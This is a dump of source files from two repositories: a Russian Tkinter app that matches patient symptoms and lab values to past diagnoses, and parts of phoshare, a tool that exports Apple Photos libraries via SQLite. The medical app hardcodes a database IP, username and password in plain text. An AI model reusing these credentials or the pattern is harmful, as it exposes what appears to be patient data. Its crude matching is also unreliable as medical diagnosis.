анализу\ndef check_outputbox():\n # Если атрибутов >= чем минимальное\n if outputbox.size() >= weight_min_value:\n # Сделать активной кнопку \"Анализировать\"\n weigh_btn['state'] = 'normal'\n else:\n # Сделать неактивной кнопку \"\"Анализировать\n weigh_btn['state'] = 'disabled'\n\n\n# Функция обновления списка выбранных атрибутов\ndef outputbox_refresh():\n # Очистить список выбранных атрибутов перед записью\n outputbox.delete(0, outputbox.size()-1)\n for atr in check:\n # Проверка на наличие перевода названия атрибута\n if translations.get(atr) is not None:\n # Перевести название атрибута и добавить\n # в список выбранных атрибтов для сравнения\n outputbox.insert('end', translations[atr]+' - '+str(check[atr]))\n else:\n # Добавить атрибут без перевода\n outputbox.insert('end', atr+' - '+str(check[atr]))\n # Проверить на минимальное количество выбранных атрибутов\n check_outputbox()\n\n\n# Функция записи атрибута в список атрибутов сравнения\ndef remember():\n widget = \"\"\n attribute = \"\"\n # Если есть выбранный ранее атрибут\n if 'last_selected' in globals():\n if len(last_selected) > 0:\n widget = last_selected['widget']\n attribute = last_selected['atr']\n # Запомнить значение атрибута из его виджета\n if widget == 'spinbox':\n string = spin.get()\n # Ограничить ввод целого числа до 200\n if string.isdigit() and int(string) <= 200:\n check.update({attribute: int(string)})\n last_selected['values'].clear()\n last_selected['values'].append(string)\n elif widget == 'option':\n check.update({attribute: option_value.get()})\n elif widget == 'checkbutton':\n # Конвертация 1 и 0 в 'да' и 'нет'\n check.update({\n attribute: 'да' if checkbutton_value.get() else 'нет'\n })\n last_selected['values'].clear()\n last_selected['values'].append(checkbutton_value.get())\n elif widget == 'spinbox_float':\n string = spin.get()\n can = True\n try:\n float(string)\n except ValueError:\n can = False\n if can:\n check.update({attribute: float(string)})\n last_selected['values'].clear()\n last_selected['values'].append(string)\n # Обновить список выбранных атрибутов\n outputbox_refresh()\n\n\n# Функция удаления атрибута из списка атрибутов сравнения\ndef forget():\n # Получаем текущий выбранный элемент\n ocs = outputbox.curselection()\n # Если есть выбранный элемент\n if len(ocs) > 0:\n # Получаем индекс\n id = lbox.get(0, 'end').index(outputbox.get(ocs).split(' -')[0])\n del check[fields[id]['atr']]\n outputbox_refresh()\n\n\n# Функция удаления всех атрибтов из списка атрибутов сравнения\ndef forget_all():\n check.clear()\n outputbox_refresh()\n\n\n# Функция создания выпадающего списка (OptionMenu)\ndef create_optionmenu():\n global option, option_value\n\n option_value = StringVar(value=last_selected['values'][0])\n option = OptionMenu(root, option_value, *last_selected['values'])\n option.place(relx=0.5, rely=0.5, anchor='center')\n\n\n# Функция создания виджета для выбранного атрибута\ndef create_widget():\n if last_selected['widget'] == 'option':\n create_optionmenu()\n elif last_selected['widget'] == 'spinbox' or \\\n last_selected['widget'] == 'spinbox_float':\n if len(last_selected['values']) > 0:\n spin_value.set(last_selected['values'][0])\n else:\n spin_value.set('0')\n spin.place(relx=0.5, rely=0.5, anchor='center')\n elif last_selected['widget'] == 'checkbutton':\n if len(last_selected['values']) > 0:\n checkbutton_value.set(last_selected['values'][0])\n else:\n checkbutton_value.set(0)\n checkbutton.place(relx=0.5, rely=0.5, anchor='center')\n\n\n# Функция вывода всплывающих сообщений\ndef show_msg(title, text):\n global popup, window_count\n\n if window_count > 0: close_window()\n popup = Toplevel()\n popup.title(title)\n popup.protocol(\"WM_DELETE_WINDOW\", close_window)\n msg = Message(popup, text=text)\n msg.pack()\n window_count += 1\n\n\ndef close_window():\n popup.destroy()\n\n\n# Функция выбора атрибута\ndef select(event):\n global last_selected, count\n # Если есть текущий выбранный атрибут\n if len(lbox.curselection()) > 0:\n # Записать атрибут как ранее выбранный\n last_selected = fields[lbox.curselection()[0]]\n # Очистить место от предыдущих виджетов\n spin.place_forget()\n if count > 0:\n option.place_forget()\n checkbutton.place_forget()\n if last_selected['widget'] == 'option':\n count += 1\n # Установить виджет для соответствующего атрибута\n create_widget()\n\n\n# Функция анализа\ndef weigh():\n weights = {}\n # Считываем в data данные из JSON-файл\n data = json_read(\"local_db.json\")\n for history in data:\n k = 0\n for attribute in check:\n if history.get(attribute) is not None:\n\t\t\t\tif type(check[attribute]) is float:\n\t\t\t\t\tif check[attribute] >= history[attribute]-5 and check[attribute] <= history[attribute]+5:\n\t\t\t\t k += 1\n elif check[attribute] == history[attribute]:\n k += 1\n elif check[attribute] == 'да':\n if history[attribute] == 1:\n k += 1\n elif check[attribute] == 'нет':\n if history[attribute] == 0:\n k += 1\n hd = history['diagnose']\n if hd not in weights:\n weights.update({hd: [0, 0, []]})\n w = weights[hd]\n if k > 0:\n w[1] += 1\n w[0] = k if k > w[0] else w[0]\n w[2].append(history)\n weights.update({hd: [w[0], w[1], w[2]]})\n # Вывод результатов в отдельном окне\n text = \"\"\n dfs = []\n weights = sorted(weights.items(), key=lambda item: item[1])\n for weight in reversed(weights):\n if weight[1][0] >= weight_min_value and \\\n weight[1][1] >= weight_min_value:\n for dictionary in weight[1][2]:\n df = pd.DataFrame(dictionary, index=[0])\n dfs.append(df)\n text += '\\n'+weight[0]+'\\n\\tМаксимум совпадений: '+str(weight[1][0])+'\\nЛюдей с похожими признаками: ' + \\\n str(weight[1][1])+'\\n'\n if text == \"\":\n text = \"Мало критериев!\"\n show_msg(\"Результат\", text)\n df2 = pd.concat(dfs)\n df0 = dfs[0].to_dict()\n cols = list(df0.keys())\n df2 = df2[cols]\n\n df2.to_csv(\"test.csv\", sep='\\t', encoding='cp1251')\n\n\n# Функция создания интерфейса\ndef main():\n global lbox, outputbox, spin, spin_value, window_width, window_height, \\\n checkbutton_value, checkbutton, root, weigh_btn\n\n window_width = 800\n window_height = 600\n listbox_width = window_width // 17\n\n root = Tk()\n root.title('Мед-Анализатор 3000')\n root.geometry(str(window_width)+'x'+str(window_height))\n root.minsize(window_width, window_height)\n root.maxsize(window_width, window_height)\n root.bind('<Return>', lambda event: remember())\n # root.protocol(\"WM_DELETE_WINDOW\", close_window)\n\n frame = Frame(root)\n frame2 = Frame(root)\n frame.pack(side='left')\n frame2.pack(side='right')\n\n lbox = Listbox(frame, width=listbox_width, height=window_height)\n lbox.pack(side='left', fill=\"y\")\n for atr in atr_list:\n if translations.get(atr) is not None:\n lbox.insert('end', translations[atr])\n else:\n lbox.insert('end', atr)\n lbox.bind('<<ListboxSelect>>', select)\n lbox.bind('<Double-1>', lambda event: remember())\n\n outputbox = Listbox(frame2, width=listbox_width, height=window_height)\n outputbox.pack(side='right', fill=\"y\")\n outputbox.bind('<Double-1>', lambda event: forget())\n\n scrollbar = Scrollbar(frame, orient=\"vertical\")\n scrollbar.config(command=lbox.yview)\n scrollbar.pack(side='right', fill=\"y\")\n\n scrollbar2 = Scrollbar(frame2, orient=\"vertical\")\n scrollbar2.config(command=outputbox.yview)\n scrollbar2.pack(side='left', fill=\"y\")\n\n spin_value = StringVar(value='0')\n spin = Spinbox(root, from_=0, to=200, textvariable=spin_value, width=5,\n format=\"%.2f\")\n checkbutton_value = IntVar()\n checkbutton = Checkbutton(text=\"Есть\", variable=checkbutton_value,\n onvalue=1, offvalue=0)\n\n btn = Button(root, text=\"Запомнить\", command=remember)\n btn.pack()\n\n btn = Button(root, text=\"Удалить\", command=forget)\n btn.pack()\n\n btn = Button(root, text=\"Удалить все\", command=forget_all)\n btn.pack()\n\n weigh_btn = Button(root, text=\"Анализировать\", state='disabled',\n padx=5, pady=5, command=weigh)\n weigh_btn.pack(side='bottom')\n\n root.mainloop()\n\n\nif __name__ == '__main__':\n global check, fields, translations, atr_list, weight_min_value\n\n # Словарь для перевода\n translations = translations.get_translation('ru')\n # Словарь атрибутов сравнения\n check = {}\n # Минимальное необходимое число для критериев Max и People\n weight_min_value = 5\n # Попытка подключения к БД\n connection = connect('62.249.154.246', 'medic', 'medlab', 'diagmed', 33547)\n # Если удалось подключиться\n if connection is not None:\n # Загрузить данные в JSON-файл\n load(connection)\n # Заполнение fields атрибутами и соответстующими им значениями и виджетами\n create_fields_list()\n # Запуск интерфейса\n main()\n"
},
{
"alpha_fraction": 0.7704523801803589,
"alphanum_fraction": 0.7820019125938416,
"avg_line_length": 55.16216278076172,
"blob_id": "22c460295ed7950d74b3f2151ccda28f5ffa484a",
"content_id": "c6594a3f051a07f34d05af74184fd2b451b490a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3548,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 37,
"path": "/README.md",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "# prediction\nProgram that will help to diagnose diseases\n\n#5 (последние изменения):\n - Кнопка \"Анализировать\" активна от 5 выбранных атрибутов\n - Главное окно теперь фиксированного размера (800x600)\n - Попытка добавить ввод вещественных чисел в Spinbox\n - При загрузке данных из БД исправляются ошибки в значениях атрибутов (строки без пробелов, приведены к нижнему регистру, ё = е, восстановлены числа из строк)\n - Попытка добавить комментарии к коду\n\n#4:\n - Добавлены функции для работы с JSON-файлами\n - Установлен минимальный размер главного окна (800x600)\n - Значения таких виджетов как Spinbox и Checkbutton теперь сохраняются индивидуально для каждого соответствующего атрибута\n - Заменены значения 1 и 0 для Checkbutton на \"есть\" и \"нет\" соответственно\n - Добавлена кнопка \"Удалить все\"\n - Если недостаточно совпадений для выдачи хотя бы 1 результата, выводит \"Мало критериев\" (вместо пустого поля)\n - Добавлена проверка на некорректный ввод в Spinbox (в том числе и на отрицательное значение)\n - При нажатии на клавишу \"Enter\" (\"Ввод\") теперь запоминается значение из виджета для текущего атрибута\n - При нажатии на клавишу \"Space\" (\"Пробел\") теперь выводится результат\n\n#3:\n - Результат отсортирован по типу: сначала максимальное количество совпавших атрибутов (Max), затем количество всех историй, в которых совпал хоть один атрибут (People)\n - Критерий для выбора диагнозов изменен с >= 3 до >= 5 для Max и People\n\n#2:\n - Добавлена кнопка удаления выбранных элементов из списка\n - Словарь переводов выведен в отдельный файл\n - Программа, загрузив данные из БД, теперь может работать автономно, используя локальные хранилища данных\n - Реакция списков на двойной клик, привязка к добавлению и удалению выбранных атрибутов соответственно\n\n#1:\n - Автоматическое заполнение значений для выбра к соответсвующим атрибутам типа \"строка\"\n - Добавлен список выбранных атрибутов для сравнения\n - Добавлен словарь для перевода названий атрибутов\n - Добавлен критерий >= 3 max кол-ва совпадений атрибутов для одной истории болезни\n - Добавлены комментарии\n"
},
{
"alpha_fraction": 0.5551839470863342,
"alphanum_fraction": 0.5551839470863342,
"avg_line_length": 45.39655303955078,
"blob_id": "730c51f2c0f9e8429242269085e3ead5a149f2d0",
"content_id": "de5a71e914df4eccbb8494a2fdfe4e6a8712213f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3452,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 58,
"path": "/translations.py",
"repo_name": "Kildsforkids/prediction",
"src_encoding": "UTF-8",
"text": "def get_translation(name):\n # Словарь для перевода\n if name == 'ru':\n return {\n 'sex': 'Пол',\n 'age': 'Возраст',\n 'tongue': 'Налет на языке',\n 'stomach': 'Живот',\n 'gallbladder_size': 'Желчный пузырь: размер',\n 'gallbladder_form': 'Желчный пузырь: форма',\n 'gallbladder_wall_thickness': 'Желчный пузырь: толщина стенок',\n 'gallbladder_bending': 'Желчный пузырь: изгиб',\n 'gallbladder_uniformity_of_walls':\n 'Желчный пузырь: однородность стенок',\n 'gallbladder_visibility_of_stones':\n 'Желчный пузырь: видимость камней',\n 'gallbladder_lumen_of_bladder': 'Желчный пузырь: просвет пузыря',\n 'pancreas_cysts': 'Поджелудочная: кисты',\n 'pancreas_contours': 'Поджелудочная: контуры',\n 'pancreas_structure': 'Поджелудочная: структура',\n 'pancreas_thickness_of_head': 'Поджелудочная: толщина головки',\n 'pancreas_length_of_body': 'Поджелудочная: длина тела',\n 'pancreas_echogenicity_of_parenchyma':\n 'Поджелудочная: эхогенность паренхимы',\n 'pancreas_duct_width': 'Поджелудочная: длина хвоста',\n 'FGDS_color': 'ФГДС: цвет',\n 'FGDS_deffects': 'ФГДС: деффекты',\n 'FGDS_walls_mucus': 'ФГДС: стенки, слизь',\n 'FGDS_walls': 'ФГДС: стенки',\n 'FGDS_cardia_closes': 'ФГДС: кардия смыкается',\n 'nausea': 'Тошнота',\n 'pain_upper_abdomen': 'Боли в верхнем отделе живота',\n 'upper_quadrant_pain_left': 'Боли в левом подреберье',\n\t\t\t'upper_quadrant_pain_right': 'Боли в правом подреберье',\n 'vomiting': 'Рвота',\n 'abdominal_distention': 'Вздутие живота',\n 'pain_on_palpation': 'Боль при пальпации',\n 'participation_of_breathing': 'Участие живота в акте дыхания',\n 'eructation': 'Отрыжка',\n 'heartburn': 'Изжога',\n 'weight_loss': 'Снижение массы тела',\n 'SOE': 'СОЭ',\n 'amylase': 'Амилаза',\n 'pancreatic_amylase': 'Панкреатическая амилаза',\n 'lipase': 'Липаза',\n 'trypsin': 'Трипсин',\n 'direct_bilirubin': 'Билирубин прямой',\n 'total_bilirubin': 'Билирубин общий',\n 'alkaline_phosphatase': 'Щелочная фосфатаза',\n 'erythrocytes': 'Эритроциты',\n 'hemoglobin': 'Гемоглобин',\n 'hematocrit': 'Гематокрит',\n 'lymphocytes': 'Лимфациты',\n 'neutrophils': 'Нейтрофилы',\n 'platelets': 'Тромбоциты',\n 'leukocytes': 'Лейкоциты'\n }\n return {}\n"
}
] | 3 |
benjavalero/phoshare | https://github.com/benjavalero/phoshare | 3c22f06b36596946f87befd1296f4f76274e76fe | 35273c19d791a5f7abd73ea143a1d7eb0ff7d57a | 259327455bab6eed977eb25308bf7f82a4611a74 | refs/heads/master | 2021-04-28T23:28:26.824579 | 2017-01-18T18:56:32 | 2017-01-18T18:56:32 | 77,703,881 | 0 | 0 | null | 2016-12-30T18:40:52 | 2015-11-08T15:33:14 | 2015-05-07T04:58:20 | null | [
{
"alpha_fraction": 0.6883116960525513,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 37.5,
"blob_id": "67e3fa6afc1324b6cf3fd8cc5de6ac2547dc272a",
"content_id": "d008ef9bd815cc4a34633a16d6333a145c179d5d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/phoshare/phoshare_version.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "\"\"\"Phoshare version information.\"\"\"\nPHOSHARE_VERSION = 'Phoshare 2.0.0 BETA'\n"
},
{
"alpha_fraction": 0.7623132467269897,
"alphanum_fraction": 0.7703375816345215,
"avg_line_length": 64.70909118652344,
"blob_id": "a44bb9e4424e432cd2359c81bb5729168b7be5a4",
"content_id": "a09bca84c671445a964f8b1b1e63562fdb07f2e0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3614,
"license_type": "permissive",
"max_line_length": 557,
"num_lines": 55,
"path": "/README.md",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "# Notice\n\nAfter Apple's discontinuation of iPhoto in favor of the new Photos app, I have made a fork of phoshare and adapted it so it can work with Photos.\n\n# Overview\n\n`phoshare` allows you to export and synchronize your Photos library to a folder tree. It preserves both the original and modified image, your folder and album organization, and applies your Photos titles, descriptions, keywords, face tags, face rectangles, places, and ratings to the IPTC/EXIF metadata of your images. You can export a full copy of your library, or just build a tree of linked images that require very little additional disk space. You can re-run `phoshare` at any time to synchronize any changes made in Photos to your export tree quickly.\n\n[Dan Warne](http://danwarne.com/) wrote a blog post on [how to back up your iPhoto library to Dropbox](http://danwarne.com/backup-iphoto-library-dropbox-resize-images-save-space-2/) with `phoshare`.\n\n`phoshare` is written in Python, and is easily customizable by just editing the Python scripts.\n\nThis fork is intended to revive `phoshare` as the original author [discontinued development](https://groups.google.com/forum/?fromgroups=#!topic/phoshare-users/moWsMcD5SdQ) in late 2012. It's meant for use with the latest version of Photos (1.0.1 as of this writing). For any version of iPhoto or Aperture, please use an earlier version from the original [project](https://code.google.com/p/phoshare/downloads/list).\n\n# TO-DO\n\nThe adaptation to Photos library is still in progress, although the main features already work. Please take into account there is no documentation available about the Photos library structure, all of it has been figured out by reverse-engineering.\n\nThere still some disabled features and possible issues:\n\n- [ ] Make script to generate an OS X app\n- [ ] Export also the images hanging from the root album.\n- [ ] Enable metadata export.\n- [ ] Enable face albums export, in case these stil exist.\n- [ ] Fix Python PEP8 and Code Inspections.\n- [ ] Clean-up entirely the code once the old features are all restored or completely discarded.\n- [ ] Fix issue if the Photos library path contains non-Ascii characters.\n- [ ] Fix issue if the export path contains non-Ascii characters.\n- [ ] Fix issue if any export filter contains non-Ascii characters.\n- [ ] When exporting try to keep in the filesystem to file dates equal to the image date.\n- [ ] Test what happens when importing to Photos an old image without metadata, and thus with no image date.\n- [ ] Test the current behaviour when exporting metadata (when enabled) if the export file is a hard link.\n- [ ] Adapt to newer version of Photos 2.0.0.\n\n# Documentation\n\nFor now, use the original [Documentation](https://sites.google.com/site/phosharedoc) link for \"How To\" information, and the [user group](http://groups.google.com/group/phoshare-users) for additional information. I will update the documentation for the fork as time permits.\n\n# License\n\nOriginal work Copyright 2010 Google Inc.\nModified work Copyright 2014 Luke Hagan\nModified work Copyright 2017 Benjamín Valero\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n"
},
{
"alpha_fraction": 0.5910133719444275,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 40.52381134033203,
"blob_id": "b577fb9f07e1a61107f07db0e2089e31e0e387ed",
"content_id": "6be595f3309f8413d7b1127b55a066eea91740c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9592,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 231,
"path": "/appledata/applexml.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n'''Reads Photo SQLite database'''\n\n# Original work Copyright 2010 Google Inc.\n# Modified work Copyright 2014 Luke Hagan\n# Modified work Copyright 2017 Benjamín Valero\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Modifications to original source:\n#\n# 2014-06-04: retrieve keywords from iPhoto database using sqlite\n# 2017-01-14: retrieve all necessary data entirely from Photos SQLite database\n \nimport calendar\nimport datetime\nimport unicodedata\nimport os\nimport sys\nimport sqlite3\n\nimport tilutil.systemutils as su\n\n\nAPPLE_BASE = calendar.timegm((2001, 1, 1, 0, 0, 0, 0, 0, -1))\nAPPLE_BASE2 = datetime.datetime.fromtimestamp(calendar.timegm((2001, 1, 1, 0, 0, 0)))\n\n\ndef getappletime(value):\n '''Converts a numeric Apple time stamp into a date and time'''\n try:\n # datetime.datetime.fromtimestamp() takes only int, which limits it to 12/13/1901\n # as the earliest possible date. Use an alternate calculation for earlier dates.\n # This one however adjusts for daylight savings time, so summer times are off by an\n # hour from the time recorded in Photos.\n if APPLE_BASE + float(value) < -sys.maxint:\n return APPLE_BASE2 + datetime.timedelta(seconds=float(value))\n return datetime.datetime.fromtimestamp(APPLE_BASE + float(value))\n except (TypeError, ValueError) as _e:\n # bad time stamp in database, default to \"now\"\n return datetime.datetime.now()\n\n\ndef get_photos_library_file(library_dir):\n \"\"\"Locates the Photos Library.apdb file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_library_file = os.path.join(library_dir, \"database\", \"Library.apdb\")\n if os.path.exists(photos_library_file):\n return photos_library_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef get_photos_metaschema_file(library_dir):\n \"\"\"Locates the Photos metaSchema.db file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_metaschema_file = os.path.join(library_dir, \"database\", \"metaSchema.db\")\n if os.path.exists(photos_metaschema_file):\n return photos_metaschema_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef get_photos_imageproxies_file(library_dir):\n \"\"\"Locates the Photos ImageProxies.apdb file.\"\"\"\n if os.path.exists(library_dir) and os.path.isdir(library_dir):\n photos_imageproxies_file = os.path.join(library_dir, \"database\", \"ImageProxies.apdb\")\n if os.path.exists(photos_imageproxies_file):\n return photos_imageproxies_file\n raise ValueError((\"%s does not appear to be a valid Photos \"\n \"library location.\") % library_dir)\n\n\ndef read_apple_library(photos_library_dir):\n photos_dict = {}\n\n photos_metaschema_file = get_photos_metaschema_file(photos_library_dir)\n photos_imageproxies_file = get_photos_imageproxies_file(photos_library_dir)\n photos_library_file = get_photos_library_file(photos_library_dir)\n\n if photos_metaschema_file:\n # Library Version\n library_version = None\n conn1 = sqlite3.connect(photos_metaschema_file)\n c1 = conn1.cursor()\n c1.execute('select value from LiGlobals where keyPath is ?', (\"libraryCompatibleBackToVersion\",))\n for result in c1.fetchall():\n library_version = int(result[0])\n photos_dict['Application Version'] = library_version\n\n if photos_imageproxies_file:\n # Resources\n conn3 = sqlite3.connect(photos_imageproxies_file)\n c3 = conn3.cursor()\n c3.execute('select attachedModelId, resourceUuid, filename from RKModelResource '\n 'where attachedModelType = 2 and resourceType = 4')\n resources_dict = {}\n for result in c3.fetchall():\n attached_model_id = int(result[0])\n resource_dict = {}\n resource_dict['resource_uuid'] = result[1]\n resource_dict['filename'] = unicodedata.normalize(\"NFC\", result[2])\n resources_dict[attached_model_id] = resource_dict\n\n if photos_metaschema_file:\n # Folders\n conn2 = sqlite3.connect(photos_library_file)\n c2 = conn2.cursor()\n c2.execute('select uuid, modelId, name, folderPath from RKFolder '\n 'where folderType = 1 and isInTrash = 0 and isMagic = 0')\n folders_by_id = {}\n folders_by_uuid = {}\n for result in c2.fetchall():\n uuid = result[0]\n model_id = int(result[1])\n folder_dict = {}\n folder_dict['name'] = result[2]\n folder_dict['folderPath'] = result[3]\n folders_by_uuid[uuid] = folder_dict\n folders_by_id[model_id] = folder_dict\n\n # Albums\n c2 = conn2.cursor()\n c2.execute('select modelId, name, folderUuid, recentUserChangeDate'\n ' from RKAlbum where albumType = 1 and albumSubclass = 3'\n ' and isInTrash = 0 and isMagic = 0')\n albums = []\n albums_by_id = {}\n for result in c2.fetchall():\n album_id = int(result[0])\n album_data = {}\n album_data['AlbumName'] = unicodedata.normalize(\"NFC\", result[1])\n album_data['AlbumDate'] = getappletime(result[3])\n album_data['KeyList'] = []\n\n # Load folder path\n album_data['FolderPath'] = None\n album_folder_uuid = result[2]\n if album_folder_uuid in folders_by_uuid:\n album_folder = folders_by_uuid[album_folder_uuid]\n parent_folder_ids = album_folder['folderPath']\n folder_path = ''\n for folder_id in parent_folder_ids.split('/'):\n if folder_id and (int(folder_id) in folders_by_id):\n parent_folder = folders_by_id[int(folder_id)]\n folder_path = os.path.join(folder_path, parent_folder['name'])\n album_data['FolderPath'] = folder_path\n\n albums.append(album_data)\n albums_by_id[album_id] = album_data\n photos_dict['List of Albums'] = albums\n\n # Versions\n c2 = conn2.cursor()\n c2.execute('select modelId, name, imageDate, createDate from RKVersion where isInTrash = 0')\n versions_dict = {}\n for result in c2.fetchall():\n model_id = int(result[0])\n version_dict = {}\n version_name = None\n if result[1]:\n version_name = unicodedata.normalize(\"NFC\", result[1])\n version_dict['VersionName'] = version_name\n if result[2]:\n version_dict['VersionDate'] = getappletime(result[2])\n else:\n version_dict['VersionDate'] = getappletime(result[3])\n versions_dict[model_id] = version_dict\n\n # Masters\n c2 = conn2.cursor()\n c2.execute('select modelId, imagePath from RKMaster '\n 'where importComplete = 1 and isInTrash = 0')\n masters_dict = {}\n for result in c2.fetchall():\n model_id = int(result[0])\n master_dict = {}\n master_dict['ImagePath'] = unicodedata.normalize(\"NFC\", result[1])\n masters_dict[model_id] = master_dict\n\n # Images\n images = {}\n for master_id in masters_dict:\n image_data = {}\n\n master_dict = masters_dict[master_id]\n original_path = os.path.join(photos_library_dir, 'Masters', master_dict['ImagePath'])\n\n if master_id in resources_dict:\n resource_dict = resources_dict[master_id]\n resource_uuid = resource_dict['resource_uuid']\n folder1 = str(ord(resource_uuid[0]))\n folder2 = str(ord(resource_uuid[1]))\n filename = resource_dict['filename']\n image_data['ImagePath'] = os.path.join(photos_library_dir, 'resources', 'modelresources',\n folder1, folder2, resource_uuid, filename)\n image_data['OriginalPath'] = original_path\n else:\n image_data['ImagePath'] = original_path\n\n version_dict = versions_dict[master_id]\n image_data['Caption'] = version_dict['VersionName']\n image_data['ImageDate'] = version_dict['VersionDate']\n images[master_id] = image_data\n photos_dict['Master Image List'] = images\n\n # TODO Keywords\n photos_dict['List of Keywords'] = []\n\n # Album-Versions\n c2 = conn2.cursor()\n c2.execute('select albumId, versionId from RKAlbumVersion')\n for result in c2.fetchall():\n album_id = int(result[0])\n version_id = int(result[1])\n\n if album_id in albums_by_id:\n album_data = albums_by_id[album_id]\n album_data['KeyList'].append(version_id)\n\n return photos_dict\n"
},
{
"alpha_fraction": 0.5523218512535095,
"alphanum_fraction": 0.559426486492157,
"avg_line_length": 33.010189056396484,
"blob_id": "d40acf53a857b8638fa006b288554f4086009fa4",
"content_id": "2660079410b9104d95a9ad7be664f4a500756bc1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23365,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 687,
"path": "/appledata/iphotodata.py",
"repo_name": "benjavalero/phoshare",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n'''Photos database: reads Photos database and parses it into albums and images.\n\n@author: [email protected]\n\nThis class reads Photos image, album and folder information from the SQLite\ndatabase in the Photos library directory. That file is written by Photo\nfor the media browser in other applications. Images in Photos are grouped using\nalbums and folders. An image may be in several albums (at least in the \"root\" album)\nand each album in a folder tree.\n\nThe album types are:\nFlagged - flagged pictures\nFolder - contains other albums\nPublished - an album published to MobileMe\nRegular - a regular user created album\nSelectedEventAlbum - most recent album (as shown in iPhoto)\nShelf - list of flagged images\nSmart - a user created smart album\nSpecialMonth - \"Last Month\"\nSpecialRoll - \"Last Import\"\nEvent - this type does not exist in the XML file, but we use it in this code\n to allow us to treat events just like any other album\nFace - Face album (does not exist in iPhoto, only in this code).\nNone - should not really happen\n'''\n\n# Original work Copyright 2010 Google Inc.\n# Modified work Copyright 2014 Luke Hagan\n# Modified work Copyright 2017 Benjamín Valero\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Modifications to original source:\n#\n# 2014-06-04: retrieve keywords from iPhoto database using sqlite;\n# fix a bug in copying of originals\n# 2017-01-14: retrieve all necessary data entirely from Photos SQLite database\n#\n\nimport datetime\nimport os\nimport re\nimport sys\n\nimport appledata.applexml as applexml\nimport tilutil.imageutils as imageutils\nimport tilutil.systemutils as su\n\n# List of extensions for image formats that are considered JPEG.\n'''\n_JPG_EXTENSIONS = ('jpg', 'jpeg')\n\n\n# Convert Aperture numeric album types to iPhoto album type names.\n_APERTURE_ALBUM_TYPES = {\n '1': 'Regular',\n '2': 'Smart',\n '3': 'Special',\n '4': 'Event',\n '5': 'Library',\n '6': 'Folder',\n '8': 'Book',\n '9': 'WebPage',\n '10':'WebJournal',\n '11': 'LightTable',\n '13': 'SmartWebPage',\n '14': 'MobileMeAccount',\n '15': 'MobileMeAlbum',\n '16': 'FlickrAccount',\n '17': 'FlickrAlbum',\n '18': 'OnlineAccount',\n '19': 'Slideshow',\n '20': 'Published',\n # Patching up some albums that are stored with no album type.\n 'Last Import': 'Special',\n 'Recovered Photos': 'Special',\n}\n\ndef parse_face_rectangle(string_data):\n \"\"\"Parse a rectangle specification into an array of coordinate data.\n\n Args:\n string_data: Rectangle like '{{x, y}, {width, height}}'\n\n Returns:\n Array of x, y, width and height as floats.\n \"\"\"\n try:\n return [float(entry.strip('{} ')) for entry in string_data.split(',')]\n except ValueError:\n print >> sys.stderr, 'Failed to parse rectangle ' + string_data\n return [ 0.4, 0.4, 0.2, 0.2 ]\n'''\n\n\nclass IPhotoData(object):\n \"\"\"top level Photos data node.\"\"\"\n\n def __init__(self, photos_dict):\n \"\"\"# call with results of readAppleXML.\"\"\"\n self.data = photos_dict\n\n self.albums = {}\n\n \"\"\"\n self.face_albums = None\n \"\"\"\n\n # Master map of keywords\n self.keywords = self.data.get(\"List of Keywords\")\n\n self.face_names = {} # Master map of faces\n \"\"\"\n face_list = self.data.get(\"List of Faces\")\n if face_list:\n for face_entry in face_list.values():\n face_key = face_entry.get(\"key\")\n face_name = face_entry.get(\"name\")\n self.face_names[face_key] = face_name\n # Other keys in face_entry: image, key image face index,\n # PhotoCount, Order\n \"\"\"\n\n self.images_by_id = {}\n image_data = self.data.get(\"Master Image List\")\n if 